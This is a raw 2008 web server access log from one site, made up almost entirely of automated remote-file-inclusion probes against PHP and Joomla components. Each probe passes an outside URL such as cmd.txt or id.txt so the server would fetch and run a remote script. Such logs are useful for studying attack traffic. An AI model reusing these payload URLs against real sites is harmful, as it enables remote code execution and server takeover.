87.0.52.88 - - [08/Jun/2008:19:08:23 -0700] "GET /Scan%20components/com_colorlab/admin.color.php?mosConfig_live_site=%20com_colorlabhhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
202.221.143.111 - - [08/Jun/2008:19:08:23 -0700] "GET /logs/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
87.0.52.88 - - [08/Jun/2008:19:08:23 -0700] "GET /logs/Scan%20components/com_colorlab/admin.color.php?mosConfig_live_site=%20com_colorlabhhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
202.221.143.111 - - [08/Jun/2008:19:08:30 -0700] "GET /logs/access_071008.log/index.php?body=http://www.motociclismo.pt/images/Equipa/jpg.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.65" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET /logs/access_071111.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET /logs/access_071111.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:30 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:58 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.203.222.50 - - [08/Jun/2008:19:08:58 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:19:09:06 -0700] "GET /logs/access_071001.log/index.php?open=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
213.194.149.28 - - [08/Jun/2008:19:10:31 -0700] "GET /logs/access_071210.log/index.php?body=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
213.194.149.28 - - [08/Jun/2008:19:10:31 -0700] "GET /logs/index.php?body=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:49 -0700] "GET /logs/access_071111.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:49 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:53 -0700] "GET /logs/access_071111.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:53 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:53 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:10:55 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:11:17 -0700] "GET /logs/access_071231.log/modules/My_eGallery/index.php?basepath=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:11:17 -0700] "GET /modules/My_eGallery/index.php?basepath=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:11:17 -0700] "GET /logs/modules/My_eGallery/index.php?basepath=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:11:22 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
203.130.242.48 - - [08/Jun/2008:19:11:27 -0700] "GET /index.php?open=http://zeroboss.helloweb.eu/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:11:30 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/idb.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
213.194.149.28 - - [08/Jun/2008:19:12:07 -0700] "GET /logs/access_071008.log/index.php?body=http://powderpuffsquad.com/admin/backups/.de/safe.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:13:12 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:13:12 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:13:12 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:13:56 -0700] "GET /logs/access_071111.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:13:56 -0700] "GET //components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:13:56 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
216.32.68.226 - - [08/Jun/2008:19:13:57 -0700] "GET /logs/access_080114.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.811" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:13:58 -0700] "GET /logs/access_071231.log/errors.php?error=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:13:58 -0700] "GET /errors.php?error=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:13:58 -0700] "GET /logs/errors.php?error=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "summitcircle.com"
62.140.19.142 - - [08/Jun/2008:19:14:22 -0700] "GET /logs/access_080127.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://nmbsquad-ng.110mb.com/adid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:14:26 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (BeOS; U; BeOS BePC; en-US; rv:1.9a1) Gecko/20051002 Firefox/1.6a1" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:17:01 -0700] "GET /logs/access_071210.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:17:01 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:17:01 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:17:02 -0700] "GET /logs/access_071112.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
87.0.52.88 - - [08/Jun/2008:19:17:35 -0700] "GET /logs/access_080421.log/Scan%20components/com_colorlab/admin.color.php?mosConfig_live_site=%20com_colorlabhhttp://www.afk.altervista.org/forum/know/id.txt?http://www.afk.altervista.org/forum/know/id.txt HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
74.200.201.194 - - [08/Jun/2008:19:19:29 -0700] "GET /logs/access_071021.log/index.php?action=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.200.201.194 - - [08/Jun/2008:19:19:29 -0700] "GET /index.php?action=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
74.200.201.194 - - [08/Jun/2008:19:19:29 -0700] "GET /logs/index.php?action=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:20:03 -0700] "GET /logs/access_071001.log////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:20:03 -0700] "GET ////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 200 785 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:20:06 -0700] "GET /logs////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 200 9529 "-" "libwww-perl/5.79" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:20:36 -0700] "GET /logs/access_070924.log////////?mosConfig_absolute_path=http://cocclan.com/SS/osyrisid.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
66.249.3.71 - - [08/Jun/2008:19:20:47 -0700] "GET /logs/index.php?option=com_custompages&cpage=com_Team/index.php?option=com_custompages&cpage=http://tp.klokan.sk/help/css/hello.txt? HTTP/1.0" 404 275 "-" "Microsoft Pocket Internet Explorer/0.6" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:22:17 -0700] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:22:17 -0700] "GET //administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:23:01 -0700] "GET //components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:23:01 -0700] "GET /logs//components/com_hashcash/server.php?mosConfig_absolute_path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/1.22 (compatible; MSIE 2.0; Windows 95)" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:23:27 -0700] "GET /logs/access_080204.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:23:27 -0700] "GET //modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:23:27 -0700] "GET /logs//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
74.200.201.194 - - [08/Jun/2008:19:23:44 -0700] "GET /logs/access_070813.log/index.php?action=http://rjoos.ch/Reise/images/tOtti/help.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.summitcircle.com"
189.129.32.158 - - [08/Jun/2008:19:24:46 -0700] "GET /logs/access_080414.log//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.129.32.158 - - [08/Jun/2008:19:24:47 -0700] "GET //administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
189.129.32.158 - - [08/Jun/2008:19:24:47 -0700] "GET /logs//administrator/components/com_peoplebook/param.peoplebook.php?mosConfig_absolute_path=http://kiliclub.com/tmp/nid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:25:32 -0700] "GET /logs/access_071210.log/index.php?principal=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:25:33 -0700] "GET /index.php?principal=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:25:33 -0700] "GET /logs/index.php?principal=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:25:58 -0700] "GET /logs/access_080127.log/index.php?principal=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:26:14 -0700] "GET /logs/access.log//modules/xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.162.2.133 - - [08/Jun/2008:19:27:03 -0700] "POST /wsnlinks/comments.php?ACTION=post&filled=1 HTTP/1.1" 404 275 "http://www.summitcircle.com" "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:28:14 -0700] "GET /logs/access_071112.log/index.php?go=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:28:14 -0700] "GET /index.php?go=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:28:15 -0700] "GET /logs/index.php?go=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
83.222.27.201 - - [08/Jun/2008:19:28:23 -0700] "GET /logs/access_070820.log/index.php?go=http://www.videomontageforum.nl/forum/gallery/default/licence.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:19:28:46 -0700] "GET /logs/access_071224.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET /logs/access_070820.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET /logs/access_070820.log//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET //modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET //modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
207.114.249.237 - - [08/Jun/2008:19:29:08 -0700] "GET /logs//modules/Forums/admin/admin_forum_prune.php?phpbb_root_path=http://www.cdpm3.com/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:29:10 -0700] "GET /components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:29:10 -0700] "GET /logs/scripts.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:29:10 -0700] "GET /logs/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
69.61.106.42 - - [08/Jun/2008:19:29:29 -0700] "GET /logs/access.log/modules/newbb_plus/class/forumpollrenderer.php?bbPath[path]=http://o-x-r-a-n-a.ru/forum/language/.lang/beleaid.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
84.16.233.241 - - [08/Jun/2008:19:31:54 -0700] "GET /logs/access_070903.log HTTP/1.1" 200 1579707 "-" "-" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:32:13 -0700] "GET /logs/access_080519.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:32:14 -0700] "GET //index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:32:14 -0700] "GET /logs//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
200.225.221.84 - - [08/Jun/2008:19:32:23 -0700] "GET /logs/access_080406.log//index.php?option=com_bayesiannaivefilter&Itemid=&mosConfig_absolute_path=http://darwin.fileave.com/alb.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
216.127.70.91 - - [08/Jun/2008:19:32:39 -0700] "GET ////////?mosConfig_absolute_path=http://rpgnet.com/newrpgnet/intranet/cmd.txt???? HTTP/1.1" 200 785 "-" "libwww-perl/5.79" "www.summitcircle.com"
203.162.2.133 - - [08/Jun/2008:19:33:15 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
195.54.209.151 - - [08/Jun/2008:19:34:26 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 196608 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:35:03 -0700] "GET /logs/access_070827.log/components/com_extcalendar/admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
72.30.215.121 - - [08/Jun/2008:19:35:52 -0700] "GET /logs/access.log HTTP/1.0" 200 121287 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp; http://help.yahoo.com/help/us/ysearch/slurp)" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:36:21 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:37:03 -0700] "GET //modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:37:03 -0700] "GET /logs/access_080414.log//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
213.194.149.215 - - [08/Jun/2008:19:37:03 -0700] "GET /logs//modules/kernel/system/startup.php?CFG_PHPGIGGLE_ROOT=http://www.ciprof.it/readme.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.812" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:38:38 -0700] "GET //surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
80.67.20.50 - - [08/Jun/2008:19:38:38 -0700] "GET /logs//surveys/survey.inc.php?path=http://www.cdpm3.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8) Gecko/20051219 SeaMonkey/1.0b" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:40:12 -0700] "GET /logs/show.php?path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:40:12 -0700] "GET /show.php?path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:40:15 -0700] "GET /logs/show.php?path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:40:15 -0700] "GET /show.php?path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "www.summitcircle.com"
74.200.71.234 - - [08/Jun/2008:19:40:23 -0700] "GET /modules/mod_calendar.php?absolute_path=http://www.allcorsa.co.uk/forums/photoplog/images/5/small/bat.jpg/echo? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:41:29 -0700] "GET /show.php?path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:41:30 -0700] "GET /logs/show.php?path=http://busway.ueuo.com/test.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.7.6) Gecko/20050512 Firefox" "summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:41:36 -0700] "GET /logs/show.php?path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:41:36 -0700] "GET /show.php?path=http://sobangnara.com/board/data/.init/est.txt??? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (X11; I; SunOS 5.4 sun4m)" "summitcircle.com"
193.111.11.7 - - [08/Jun/2008:19:42:00 -0700] "GET /logs/access_080120.log//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
193.111.11.7 - - [08/Jun/2008:19:42:09 -0700] "GET //protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
70.86.5.10 - - [08/Jun/2008:19:42:13 -0700] "GET /show.php?path=http://www.geocities.com/dinarisma/new.gif??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.summitcircle.com"
193.111.11.7 - - [08/Jun/2008:19:42:17 -0700] "GET /logs//protection.php?action=logout&siteurl=http://www.injoyusa.com/sistem.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.summitcircle.com"
203.162.2.135 - - [08/Jun/2008:19:44:26 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 262144 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
121.247.52.222 - - [08/Jun/2008:19:46:22 -0700] "GET /logs/access_070709.log HTTP/1.1" 200 229886 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)" "www.summitcircle.com"
